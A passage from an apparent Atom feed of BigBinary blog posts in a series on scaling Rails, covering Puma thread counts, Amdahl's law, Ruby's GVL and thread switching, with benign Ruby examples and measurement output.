We can set the value of<code>RAILS_MAX_THREADS</code> to 4.</p><p><img src="/blog_images/2025/tuning-puma-max-threads-configuration-with-gvl-instrumentation/speedup-vs-thread-count.png" alt="Speedup V/S Number of threads"></p><p>Looking at the table, adding a 5th thread would only give us a 3% performanceimprovement, which may not justify the additional memory usage and potential GVLcontention.</p><p>We have also created a small application to help visualize and find the idealnumber of threads when the I/O percentage is provided as input.<a href="https://v0-single-page-application-lake.vercel.app/">Here</a> is the link to theapp.</p><h2>Validate thread count using stall time</h2><p>This value of <code>4</code> we got theoretically by using Amdahl's law. Now it's time toput this law to test. Let's see in the real world if the value of <code>4</code> is thecorrect value or not.</p><p>What we need to do is start with <code>RAILS_MAX_THREADS</code> env variable (Puma<code>max_threads</code>) set to <code>4</code> and then check if this value provides minimal GVLcontention. By GVL contention, we mean the amount of time a thread spendswaiting for the GVL i.e the stall time.</p><p>If the stall time is high, that means the set thread count is high. We don'twant our request threads to spend their time doing nothing causing latencyspikes.<code>75ms</code> is an acceptable value for stall time. The lesser the better ofcourse.</p><p>The average stall time can be found in the perfm analyzer results. 
As wementioned earlier, we had collected data for <a href="https://neeto.com/cal">NeetoCal</a>.Now let's find the average stall time.</p><pre><code class="language-ruby">irb(main):001* gvl_metrics_analyzer = Perfm::GvlMetricsAnalyzer.new(irb(main):002*   start_time: 2.days.ago,irb(main):003*   end_time: Time.current,irb(main):004*   puma_max_threads: 4irb(main):005&gt; )irb(main):006&gt; results = gvl_metrics_analyzer.analyzeirb(main):007&gt; avg_stall_ms = results[:summary][:average_stall_ms]=&gt; 110.24</code></pre><p>The stall time seems a bit high. Let us decrease the <code>RAILS_MAX_THREADS</code> valueby 1 and collect a few data points(i.e around 20K requests). Now the value of<code>RAILS_MAX_THREADS</code> will be <code>3</code>. This process has to be repeated until we findthe value for which the average stall time is less than <code>75ms</code>.</p><pre><code class="language-ruby">irb(main):001* gvl_metrics_analyzer = Perfm::GvlMetricsAnalyzer.new(irb(main):002*   start_time: 2.days.ago,irb(main):003*   end_time: Time.current,irb(main):004*   puma_max_threads: 3irb(main):005&gt; )irb(main):006&gt; results = gvl_metrics_analyzer.analyzeirb(main):007&gt; avg_stall_ms = results[:summary][:average_stall_ms]=&gt; 79.38</code></pre><p>Now the output is closer to <code>75 ms</code>.</p><p>Hence we can finalize on the value 3 as the value for <code>RAILS_MAX_THREADS</code>. If wedecrease the value again by one i.e set it to 2, the stall time will decreasebut we're limiting the concurrency of our application. It is a trade-off.</p><p>Remember that our goal is to maximize concurrency while minimizing GVLcontention. But if our app spends a lot of time doing I/O - for instance, if wehave a proxy application that makes a lot of external API calls directly fromthe controller, then we can switch the app server to<a href="https://github.com/socketry/falcon">Falcon</a>. 
Falcon is tailor-made for such use cases.</p><p>Broadly speaking, one should take care of the following items to ensure that the time spent by the request doing I/O is minimal.</p><ul><li>Remove N+1 queries</li><li>Remove long-running queries</li><li>Move inline third-party API calls to a background job processor</li><li>Move heavy computational work to a background job processor</li></ul><p>For a finely optimized Rails application, the <code>max_threads</code> value will be around 3. That's why the default value of <code>max_threads</code> for Rails applications is <code>3</code> now. This was decided after a lot of discussion <a href="https://github.com/rails/rails/issues/50450">here</a>. We recommend you read the whole discussion. It is very interesting.</p><p><em>This was Part 4 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of the blog is not clear to you, then please write to us on <a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>, <a href="https://twitter.com/bigbinary">Twitter</a> or via the <a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Amdahl's Law - The Theoretical Relationship Between Speedup and Concurrency]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency"/>
      <updated>2025-04-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency</id>
      <content type="html"><![CDATA[<p><em>This is Part 3 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><p>We have only two parameters to work with if we want to fine-tune our Pumaconfiguration.</p><ol><li>The number of processes.</li><li>The number of threads each process can have.</li></ol><p>In<a href="https://bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance">part 1</a>of <a href="https://www.bigbinary.com/blog/scaling-rails-series">Scaling Rails series</a>,we saw what the number of processes should be. Now let's look at what the numberof threads in each process should be.</p><h2>Amdahl's law</h2><p>Each application has a few things which must be performed in &quot;serial order&quot; anda few things which can be &quot;parallelized&quot;. If we draw a diagram, then this iswhat it will look like.</p><p><img src="/blog_images/2025/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency/amdahls-gantt-chart1.png" alt="Amdahl's law Gantt chart"></p><p>Let's say that <code>T1'</code> and <code>T2'</code> are the enhanced times. These are the times theapplication would take after the enhancement has been applied. In this case theenhancement will come in the form of increasing the threads in a process.</p><p><code>T1'</code> will be same as <code>T1</code> since it's the serial part. <code>T2'</code> will be lower than<code>T2</code> since we will parallelize some of the code. 
After the parallelization isdone, the enhanced version would look something like this.</p><p><img src="/blog_images/2025/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency/amdahls-gantt-chart.png" alt="Amdahl's law Gantt chart"></p><p>It's clear that the serial part (T1) will limit how much speedup we can get nomatter how much we parallelize <code>T2</code>.</p><p>Computer scientist <a href="https://en.wikipedia.org/wiki/Gene_Amdahl">Gene Amdahl</a> cameup with <a href="https://en.wikipedia.org/wiki/Amdahl%27s_law">Amdahl's law</a> which givesthe mathematical value for the overall speedup that can be achieved.</p><p><img src="/blog_images/2025/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency/amdahls-law.png" alt="Amdahl's law picture"></p><p>I made a video explaining how this formula came about.</p><p>&lt;iframewidth=&quot;966&quot;height=&quot;604&quot;src=&quot;https://www.youtube.com/embed/2hYs2X6Fb1M?si=f-P_-pcwnotnyUKT&quot;title=&quot;Amdahl's Law&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p><em>Amdahl's law states that the theoretical speedup gained from parallelization isdirectly determined by the fraction of sequential code in the program.</em></p><p>Now, let's see how we can use Amdahl's law to determine the ideal number ofthreads.</p><p>The parallelizable portion in this case is the portion of the application thatspends time doing I/O. The non-parallelizable portion is the time spent by theapplication executing Ruby code. Remember that because of GVL, within a process,only one thread has access to CPU at any point of time.</p><p>Now we need to know what percentage of time our app spends doing I/O. 
This willbe the value <code>p</code> as per the video.</p><p>Later in this series, we'll show you how to calculate what percentage of thetime the Rails application is spending doing I/O. For this blog let's assumethat our application spends 37% of the time doing I/O i.e the value of <code>p</code> is<strong>0.37</strong>.</p><p>Let's calculate how much speedup we will get if we use one thread(n is 1). Nowlet's change n to 2 and get the speedup value. Similarly, we bump up n all theway to 15 and we record the speedup.</p><p>Now let's draw a graph between the overall speedup and the number of threads.</p><p><img src="/blog_images/2025/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency/speedup-vs-thread-count.png" alt="Speedup V/S Number of threads"></p><p>From the graph, it can be seen that the speedup increases as the number ofthreads increases, but the rate of increase diminishes as more threads areadded. This is because the serial portion remains constant and is unaffected bythe increase in threads.</p><table><thead><tr><th>Threads(N)</th><th>Speedup(S)</th><th>% Improvement from previous run</th></tr></thead><tbody><tr><td>1</td><td>1.000</td><td>-</td></tr><tr><td>2</td><td>1.227</td><td>22.7%</td></tr><tr><td>3</td><td>1.366</td><td>11.3%</td></tr><tr><td>4</td><td>1.456</td><td>6.6%</td></tr><tr><td>5</td><td>1.518</td><td>4.2%</td></tr><tr><td>6</td><td>1.562</td><td>2.9%</td></tr><tr><td>7</td><td>1.594</td><td>2.0%</td></tr><tr><td>8</td><td>1.619</td><td>1.6%</td></tr></tbody></table><p>By examining the graph we can observe that the speedup gain from increasingthreads seem significant up to 4 threads, after which the incremental gain inspeedup starts to plateau.</p><p>Remember that these are theoretical maximums based on Amdahl's law. 
In practice,we need to use fewer threads as adding more threads can cause an increase inmemory usage and GVL contention, thereby causing latency spikes.</p><p>It's obvious that if we add more threads then more requests can be handled byPuma concurrently. What it means is that requests will be waiting for lessertime at the load balancer layer as there are more Puma threads waiting to pickup the request for processing. But in part 1, we saw that just because we havemore threads, it doesn't mean things will move faster. More threads might causeother threads to wait for the GVL.</p><p>There is no point in accepting requests if our web server can't respond to itpromptly. Whereas, if the <code>max_threads</code> value is set to a lower value, requestswill queue up at the Load Balancer layer which is better than overwhelming theapplication server.</p><p>If more and more requests are waiting at the load balancer level, then therequest queue time will shoot up. The right way to solve this problem is to addmore Puma processes. It is advised to increase the capacity of the Puma serverby adding more processes rather than increasing the number of threads.</p><p><a href="https://gist.github.com/neerajsingh0101/35e5307fb197b08ac6a62aa725cafec6">Here</a>is a middleware that can be used to track the request queue time. This code istaken from<a href="https://github.com/judoscale/judoscale-ruby/blob/15a4e9bd59734defb76656b59cba067b60aed473/judoscale-ruby/lib/judoscale/request_metrics.rb">judoscale</a>.</p><p>Note that <strong>Request Queue Time</strong> is the time spent waiting before the request ispicked up for processing.</p><p>This middleware will only work if the load balancer is adding the<code>HTTP_REQUEST_START</code> header. 
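For a rough idea of what such a middleware does, here is an illustrative sketch. This is not the judoscale code; it assumes the header value uses Heroku's `t=<unix epoch in milliseconds>` format, and the `request.queue_time_ms` env key is a name we made up.

```ruby
# Illustrative Rack middleware: computes how long a request waited between
# the load balancer and the app server, using the HTTP_REQUEST_START header
# ("t=<unix epoch in milliseconds>").
class RequestQueueTimeMiddleware
  def initialize(app)
    @app = app
  end

  def call(env)
    if (header = env["HTTP_REQUEST_START"])
      started_at_ms = header.delete("^0-9.").to_f # strip the "t=" prefix
      queue_time_ms = Time.now.to_f * 1000 - started_at_ms
      env["request.queue_time_ms"] = [queue_time_ms, 0.0].max
    end
    @app.call(env)
  end
end
```

The computed value can then be reported to an APM; negative values (from clock skew between the load balancer and the app server) are clamped to zero.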
Heroku automatically adds this header.</p><p>To use this middleware, open the <code>config/application.rb</code> file and add the following line.</p><pre><code class="language-ruby">config.middleware.use RequestQueueTimeMiddleware</code></pre><p><em>This was Part 3 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of the blog is not clear to you, then please write to us on <a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>, <a href="https://twitter.com/bigbinary">Twitter</a> or via the <a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[GVL in Ruby and the impact of GVL in scaling Rails applications]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/gvl-in-ruby-and-its-impact-in-scaling-rails-applications"/>
      <updated>2025-04-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/gvl-in-ruby-and-its-impact-in-scaling-rails-applications</id>
      <content type="html"><![CDATA[<p><em>This is Part 2 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><p>Let's start from the basics. Let's see how a standard web application mostlybehaves.</p><h2>Web applications and CPU usage</h2><p>Code in a web application typically works like this.</p><ul><li>Do some data manipulation.</li><li>Make a few database calls.</li><li>Do more calculations.</li><li>Make some network calls.</li><li>Do more calculations.</li></ul><p>Visually, it'll look something like this.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/work-done-in-processing-web-request.png" alt="Three threads 1 process &amp; 2 cores"></p><p>CPU work includes operations like view rendering, string manipulation, any kindof business logic processing etc. In short, anything that involves Ruby codeexecution can be considered CPU work. For the rest of the work, like databasecalls, network call etc. CPU is idle. Another way of looking at when the CPU isworking and when it's idle is this picture.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/cpu-working-idle.png" alt="CPU sometimes working &amp; sometimes idle"></p><p>When a program is using CPU, then that portion of the code is called <strong>CPUbound</strong> and when program is not using CPU, then that portion of the code iscalled <strong>IO bound</strong>.</p><h3>CPU bound or IO bound</h3><p>Let us understand what <strong>CPU bound</strong> truly means. Consider the following pieceof code.</p><pre><code class="language-ruby">10.times do  Net::HTTP.get(URI.parse(&quot;https://bigbinary.com&quot;))end</code></pre><p>In the above code, we are hitting the BigBinary website 10 times sequentially.Running the above code takes time because making a network connection is atime-consuming process.</p><p>Let's assume the code above takes 10 seconds to finish. We want the code to runfaster. 
So we bought a better CPU for the server. Do you think now the code willrun faster?</p><p>It will not. That's because the above code is <strong>not</strong> CPU bound. CPU is not thelimiting factor in this case. This code is I/O bound.</p><p>A program is <strong>CPU bound</strong> if the program will run faster if the CPU werefaster.</p><p>A program is <strong>I/O bound</strong> if the program will run faster if the I/O operationswere faster.</p><p>Some of the examples of I/O bound operations are:</p><ul><li><strong>making database calls</strong>: reading data from tables, creating new tables etc.</li><li><strong>making network calls</strong>: reading data from a website, sending emails etc.</li><li><strong>dealing with file systems</strong>: reading files from the file system.</li></ul><p>Previously, we saw that our CPU was idle sometimes. Now we know that thetechnical term for that idleness is <strong>IO bound</strong> let's update the picture.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/cpu-bound-io-bound.png" alt="CPU bound and IO bound"></p><p>When a program is I/O bound, the CPU is not doing anything. We don't wantprecious CPU cycles to be wasted. So what can we do so that the CPU is fullyutilized?</p><p>So far we have been dealing with only one thread. We can increase the number ofthreads in the process. In this way, whenever the CPU is done executing CPUbound code of one thread and that thread is doing an I/O bound operation, thenthe CPU can switch and handle the work from another thread. This will ensurethat the CPU is efficiently utilized. We will look at how the switching betweenthreads works a bit later in the article.</p><h2>Concurrency vs Parallelism</h2><p>Concurrency and parallelism sound similar, and in your daily life, you cansubstitute one for another, and you will be fine. 
However, from the computerengineering point of view, there is a difference between work happeningconcurrently and work happening in parallel.</p><p>Imagine a person who has to respond to 100 emails and 100 Twitter messages. Theperson can reply to an email and then reply to a Twitter message, then do thesame all over again: reply to an email and reply to a Twitter message.</p><p>The boss will see the count of pending emails and Twitter messages go down from100 to 99 to 98. The boss might think that the work is happening in &quot;parallel.&quot;But that's not true.</p><p>Technically, the work is happeningconcurrently. For a system to be parallel, itshould have two or more actions executed simultaneously. In this case, at anygiven moment, the person was either responding to email or responding toTwitter.</p><p>Another way to look at it is that <strong>Concurrency is about dealing</strong> with lots ofthings at the same time. <strong>Parallelism is about doing</strong> lots of things at thesame time.</p><p>If you find it hard to remember which one is which then remember that<strong>concurrency</strong> starts with the word <strong>con</strong>. Concurrency is the <em>conman</em>. It'spretending to be doing things &quot;in parallel,&quot; but it's only doing thingsconcurrently.</p><h2>Understanding GVL in Ruby</h2><p>GVL (Global VM Lock) in Ruby is a mechanism that prevents multiple threads fromexecuting Ruby code simultaneously. The GVL acts like a traffic light in aone-lane bridge. Even if multiple cars (threads) want to cross the bridge at thesame time, the traffic light (GVL) allows only one car to pass at a time. Onlywhen one car has made it safely to the other end, the second car is allowed bythe traffic light(GVL) to start.</p><p>Ruby's memory management(like garbage collection) and some other parts of Rubyare not thread-safe. 
Hence, the GVL ensures that only one thread runs Ruby code at a time to avoid any data corruption.</p><p>When a thread &quot;holds the GVL&quot;, it has exclusive access to modify the VM structures.</p><p>It's important to note that the GVL is there to protect how Ruby works and manages Ruby's internal VM state. The GVL is not there to protect our application code. It's worth repeating. The presence of the GVL doesn't mean that we can write our code in a thread-unsafe manner and expect Ruby to take care of all threading issues in our code.</p><p>Ruby offers tools like <a href="https://ruby-doc.com/3.3.6/Thread/Mutex.html">Mutex</a> and the <a href="https://github.com/ruby-concurrency/concurrent-ruby">concurrent-ruby</a> gem to manage concurrent code. For example, the following code (<a href="https://www.youtube.com/watch?v=rI4XlFvMNEw&amp;t=575s">source</a>) is not thread-safe and the GVL will not protect our code from race conditions.</p><pre><code class="language-ruby">from = 100_000_000
to = 0

50.times.map do
  Thread.new do
    while from &gt; 0
      from -= 1
      to += 1
    end
  end
end.map(&amp;:join)

puts &quot;to = #{to}&quot;</code></pre><p>When we run this code, we might expect the result to always equal 100,000,000 since we're just moving numbers from <code>from</code> to <code>to</code>. However, if we run it multiple times, we'll get different results.</p><p>This happens because multiple threads are trying to modify the same variables (<code>from</code> and <code>to</code>) simultaneously without any synchronization. This is called a race condition, and it happens because the operations <code>to += 1</code> and <code>from -= 1</code> are non-atomic at the CPU level.
In simpler terms, the operation <code>to += 1</code> can be written as three CPU-level operations.</p><ol><li>Read the current value of <code>to</code>.</li><li>Add 1 to it.</li><li>Store the result back to <code>to</code>.</li></ol><p>To fix this race condition, the above code can be rewritten using a <a href="https://docs.ruby-lang.org/en/master/Thread/Mutex.html">Mutex</a>.</p><pre><code class="language-rb">from = 100_000_000
to = 0
lock = Mutex.new

50.times.map do
  Thread.new do
    while from &gt; 0
      lock.synchronize do
        if from &gt; 0
          from -= 1
          to += 1
        end
      end
    end
  end
end.map(&amp;:join)

puts &quot;to = #{to}&quot;</code></pre><p>It's worth noting that Ruby implementations like JRuby and TruffleRuby don't have a GVL.</p><h2>GVL dictates how many processes we will need</h2><p>Let's say that we deploy the production app to AWS EC2's <code>t2.medium</code> machine. This machine has 2 vCPUs, as we can see from this chart.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/t2-medium.png" alt="T2 medium"></p><p>Without going into the CPU vs vCPU discussion, let's keep things simple and assume that the AWS machine has two cores. So we have deployed our code on a machine with two cores, but we have only one process running in production. No worries. We have three threads. So three threads can share two cores. You would think that something like this should be possible.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/puma-one-process-2-cores.png" alt="Three threads 1 process &amp; 2 cores"></p><p>But it's not possible. Ruby doesn't allow it.</p><p>It's not possible because Thread 1 and Thread 2 belong to the same process. This is because of the <strong>Global VM Lock (GVL)</strong>.</p><p>The GVL ensures that only one thread can execute CPU bound code at a time within a single Ruby process.
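A quick experiment shows what this means in practice: `sleep` below stands in for an I/O wait (a DB call, an HTTP request), during which the GVL is released, so four threads sleeping 0.2 seconds each finish together in roughly 0.2 seconds instead of 0.8. Timings are approximate.

```ruby
# Measure the wall-clock time of a block.
def elapsed
  start = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  yield
  Process.clock_gettime(Process::CLOCK_MONOTONIC) - start
end

# sleep stands in for an I/O wait; it releases the GVL, so threads overlap.
serial   = elapsed { 4.times { sleep 0.2 } }                                 # roughly 0.8s
threaded = elapsed { 4.times.map { Thread.new { sleep 0.2 } }.each(&:join) } # roughly 0.2s
puts format("serial: %.2fs, threaded: %.2fs", serial, threaded)
```

Replace the `sleep` with a pure-Ruby busy loop and the threaded version loses its advantage, because only one thread can hold the GVL at a time.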
The important thing to note here is that this lock is <strong>only for CPU-bound code</strong> and <strong>only within the same process</strong>.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/gvl-lock.png" alt="Single Process Multi Core"></p><p>In the above case, all three threads can do DB operations in parallel. But two threads of the same process can't be doing CPU operations in parallel.</p><p>We can see that &quot;Thread 1&quot; is using Core 1. Core 2 is available, but &quot;Thread 2&quot; can't use Core 2. The GVL won't allow it.</p><p>Again, let's revisit what the GVL does. For CPU-bound code, the GVL ensures that only one thread from a process can access the CPU.</p><p>So now the question is how do we utilize Core 2. Well, the GVL is applied at a process level. Threads of the same process are not allowed to do CPU operations in parallel. Hence, the solution is to have more processes.</p><p>To have two Puma processes, we need to set the value of the env variable <code>WEB_CONCURRENCY</code> to 2 and reboot Puma.</p><pre><code class="language-ruby">WEB_CONCURRENCY=2 bundle exec rails s</code></pre><p>Now we have two processes, and both Core 1 and Core 2 are being utilized.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/gvl-two-process.png" alt="Multi Process Multi Core"></p><p>What if the machine has 5 cores? Do we need 5 processes?</p><p>Yes. In that case, we will need 5 processes to utilize all the cores.</p><p>Therefore, for maximum utilization, the rule of thumb is that the number of processes, i.e. <code>WEB_CONCURRENCY</code>, should be set to the number of cores available in the machine.</p><h2>Thread switching</h2><p>Now let's see how switching between threads happens in a multi-threaded environment. 
Note that the number of threads is 2 in this case.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/thread1-thread2.png" alt="CPU bound and IO bound"></p><p>As we can see, the CPU switches between Thread 1 and Thread 2 whenever it's idle. This is great. We don't waste CPU cycles now, as we did in the single-threaded case. But the switching logic is much more nuanced than what is shown in the picture.</p><p>Ruby manages multiple threads at two levels: the operating system level and the Ruby level. When we create threads in Ruby, they are &quot;native threads&quot;, meaning they are real threads that the operating system (OS) can see and manage.</p><p>All operating systems have a component called the scheduler. In Linux, it's called the <a href="https://en.wikipedia.org/wiki/Completely_Fair_Scheduler">Completely Fair Scheduler</a> or CFS. This scheduler decides which thread gets to use the CPU and for how long. However, Ruby adds its own layer of control through the Global VM Lock (GVL).</p><p>In Ruby, a thread can execute CPU-bound code only if it holds the GVL. The Ruby VM makes sure that a thread can hold the GVL for up to 100 milliseconds. After that, the thread will be forced to release the GVL if there is another thread waiting to execute CPU-bound code. This ensures that the waiting Ruby threads are not <a href="https://en.wikipedia.org/wiki/Starvation_(computer_science)">starved</a>.</p><p>When a thread is executing CPU-bound code, it will continue until either:</p><ol><li>It completes its CPU-bound work.</li><li>It hits an I/O operation (which automatically releases the GVL).</li><li>It reaches the limit of 100ms.</li></ol><p>When a thread starts running, the Ruby VM uses a background timer thread at the VM level that checks every 10ms how long the current Ruby thread has been running. 
If the thread has been running longer than the thread quantum (100ms by default), the Ruby VM takes back the GVL from the active thread and gives it to the next thread waiting in the queue. When a thread gives up the GVL (either voluntarily or because it is forced to), it goes to the back of the queue.</p><p>The default thread quantum is 100ms, and starting from Ruby 3.3, it can be configured using the <code>RUBY_THREAD_TIMESLICE</code> environment variable. <a href="https://bugs.ruby-lang.org/issues/20861">Here</a> is the link to the discussion. This environment variable allows fine-tuning of thread scheduling behavior: a smaller quantum means more frequent thread switches, while a larger quantum means fewer switches.</p><p>Let's see what happens when we have two threads.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/multi-threaded.png" alt="CPU bound and IO bound"></p><ol><li>T1 completes the quantum limit of 100ms and gives up the GVL to T2.</li><li>T2 completes 50ms of CPU work and voluntarily gives up the GVL to do I/O.</li><li>T1 completes 75ms of CPU work and voluntarily gives up the GVL to do I/O.</li><li>Both T1 and T2 are doing I/O and don't need the GVL.</li></ol><p>It means that Thread 2 would be a lot faster if it had more access to the CPU. To make the CPU instantly available, we can reduce the number of threads the CPU has to handle. But we need to play a balancing game. If the CPU is idle, then we are paying for processing capacity for no reason. If the CPU is extremely busy, then requests will take longer to process.</p><h2>Thread switching can lead to misleading data</h2><p>Let's take a look at the simple code given below. 
This code is taken from <a href="https://byroot.github.io/ruby/performance/2025/01/23/the-mythical-io-bound-rails-app.html">a blog post</a> by <a href="https://x.com/_byroot">Jean Boussier</a>.</p><pre><code class="language-ruby">start = Time.now
database_connection.execute(&quot;SELECT ...&quot;)
query_duration = (Time.now - start) * 1000.0
puts &quot;Query took: #{query_duration.round(2)}ms&quot;</code></pre><p>The code looks simple. If the result is, say, <code>Query took: 80ms</code>, then you would think that the query actually took <code>80ms</code>. But now we know two things:</p><ul><li>Executing a database query is an IO operation (IO bound).</li><li>Once the IO-bound operation is done, the thread might not immediately get hold of the GVL to execute CPU-bound code.</li></ul><p>Think about it. What if the query took only <code>10ms</code> and for the rest of the <code>70ms</code> the thread was waiting for the CPU because of the GVL? The only way to know which portion took how much time is by instrumenting the GVL.</p><h2>Visualizing the effect of the GVL</h2><p>To better understand the effect of multiple threads on Ruby's performance, let's do a quick test. We'll start with a <strong>cpu_intensive</strong> method that performs pure arithmetic operations in nested loops, creating a workload that is heavily CPU dependent.</p><p><a href="https://gist.github.com/neerajsingh0101/de84bf200fae4e2003205ed81fcd9d7f">Here</a> is the code.</p><p>Running this script produced the following output:</p><pre><code class="language-ruby">Running demonstrations with GVL tracing...

Starting demo with 1 threads doing CPU-bound work
Time elapsed: 7.4921 seconds

Starting demo with 3 threads doing CPU-bound work
Time elapsed: 7.8146 seconds</code></pre><p>From the output, we can see that for CPU-bound work, a single thread performed better. Why? Let's visualize the result with the help of the traces generated in the above script using the <a href="https://github.com/ivoanjo/gvl-tracing">gvl-tracing</a> gem. 
The trace files can be visualized using <a href="https://ui.perfetto.dev/">Perfetto</a>, which provides a timeline view showing how threads interact with the GVL.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/cpu-single-multi.png" alt="Single and multi threads CPU bound"></p><p>We can see above that in the case of CPU-bound work, if we have a single thread then it's not waiting for the GVL. However, if we have three threads, then each thread is waiting for the GVL multiple times.</p><h3>Understanding the advantage of multiple threads in mixed workloads</h3><p>Now let's look at mixed workloads in single-threaded and multi-threaded environments. We'll use a separate script with a <strong>mixed_workload</strong> method that combines CPU-bound work with I/O operations. We use <code>IO.select</code> with blocking behavior to simulate I/O operations. This creates actual I/O blocking that releases the GVL and shows up as &quot;waiting&quot; in the GVL trace, accurately representing real-world I/O operations like database queries.</p><p><a href="https://gist.github.com/neerajsingh0101/af1eb90a79c7da429d4287528d7bb788">Here</a> is the code for the mixed workload test.</p><p>Running this script with 1 thread and 3 threads produced the following output:</p><pre><code class="language-ruby">Running demonstrations with GVL tracing...

Starting demo with 1 thread doing Mixed I/O and CPU work
Time elapsed: 9.32 seconds

Starting demo with 3 threads doing Mixed I/O and CPU work
Time elapsed: 6.1344 seconds</code></pre><p>The key advantage of multiple threads in mixed workloads lies in how the GVL is managed during I/O operations. 
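</p><p>The speedup above can be reproduced with plain <code>sleep</code> calls (a minimal sketch, not from the original post; <code>sleep</code> releases the GVL just like real blocking I/O):</p>

```ruby
require "benchmark"

# sleep stands in for a blocking I/O call (a database query or a
# network request); like real I/O, it releases the GVL while waiting.
io_work = -> { sleep 0.2 }

serial = Benchmark.realtime { 3.times { io_work.call } }
threaded = Benchmark.realtime do
  3.times.map { Thread.new { io_work.call } }.each(&:join)
end

puts format("serial: %.2fs, threaded: %.2fs", serial, threaded)
```

<p>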
When a thread encounters an I/O operation (like a database query, network call, or file read), it voluntarily releases the GVL. This is fundamentally different from CPU-bound work, where threads compete for the GVL and one thread must wait for another to finish or reach the 100ms quantum limit.</p><p>During I/O operations, the thread is essentially blocked waiting for an external resource (database, network, disk). While waiting, the thread doesn't need the GVL because it's not executing Ruby code. This creates an opportunity for other threads to acquire the GVL and do useful CPU work. The result is that CPU cycles that would otherwise be wasted during I/O waits are now being utilized productively by other threads.</p><p>Let's visualize this with the single-threaded case first:</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/mixed-single.png" alt="Single thread mixed workload"></p><p>In the single-threaded case, the thread waits for I/O operations to complete. During these I/O waits, the CPU sits idle. The thread performs some CPU work, then waits for I/O, then does more CPU work, then waits for I/O again. During all the I/O wait periods, no productive work is happening. The CPU is available, but there's no other thread to utilize it.</p><p>Now let's look at the multi-threaded case with three threads:</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/mixed-multi.png" alt="Multi threaded mixed workload"></p><p>When there are three threads, the situation changes a bit. Threads now occasionally spend time waiting for the GVL, but the overall throughput is significantly better.</p><p>When Thread 1 releases the GVL to perform I/O, Thread 2 can immediately acquire it and start executing CPU-bound work. While Thread 2 is working, Thread 1 might still be waiting for its I/O operation to complete. Then, when Thread 2 releases the GVL for its own I/O operation, Thread 3 can acquire it. 
This creates a pipeline effect where threads are constantly handing off the GVL to each other, ensuring that the CPU is almost always doing useful work.</p><p>The small amount of GVL contention we see in the multi-threaded case (threads waiting for the GVL) is more than compensated for by the elimination of idle CPU time. Instead of the CPU sitting idle during I/O operations, other threads keep it busy.</p><p>This is why Rails applications with typical workloads (lots of database queries, API calls, and other I/O operations) benefit significantly from having multiple threads.</p><h2>Why can't we increase the thread count to a really high value?</h2><p>In the previous section, we saw that increasing the number of threads can help in utilizing the CPU better. So why can't we increase the number of threads to a really high value? Let's visualize it.</p><p>In the hope of increasing performance, let's bump up the number of threads in the previous code snippet to <code>20</code> and look at the gvl-tracing result.</p><p><img src="/blog_images/2025/gvl-in-ruby-and-its-impact-in-scaling-rails-applications/20-threads.png" alt="20 threads"></p><p>As we can see in the above picture, the amount of GVL contention is massive here. Threads are waiting to get hold of the GVL. The same will happen inside a Puma process if we increase the number of threads to a very high value. As we know, each request is handled by a thread. GVL contention, therefore, means that requests keep waiting, thereby increasing latency.</p><h2>What's next</h2><p>In the coming blogs, we'll see how we can figure out the ideal value for <code>max_threads</code>, both theoretically and empirically, based on our application's workload.</p><p><em>This was Part 2 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>. 
If any part of the blog is not clear to you, please write to us on <a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>, <a href="https://twitter.com/bigbinary">Twitter</a> or via the <a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding how Puma handles requests]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance"/>
      <updated>2025-04-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance</id>
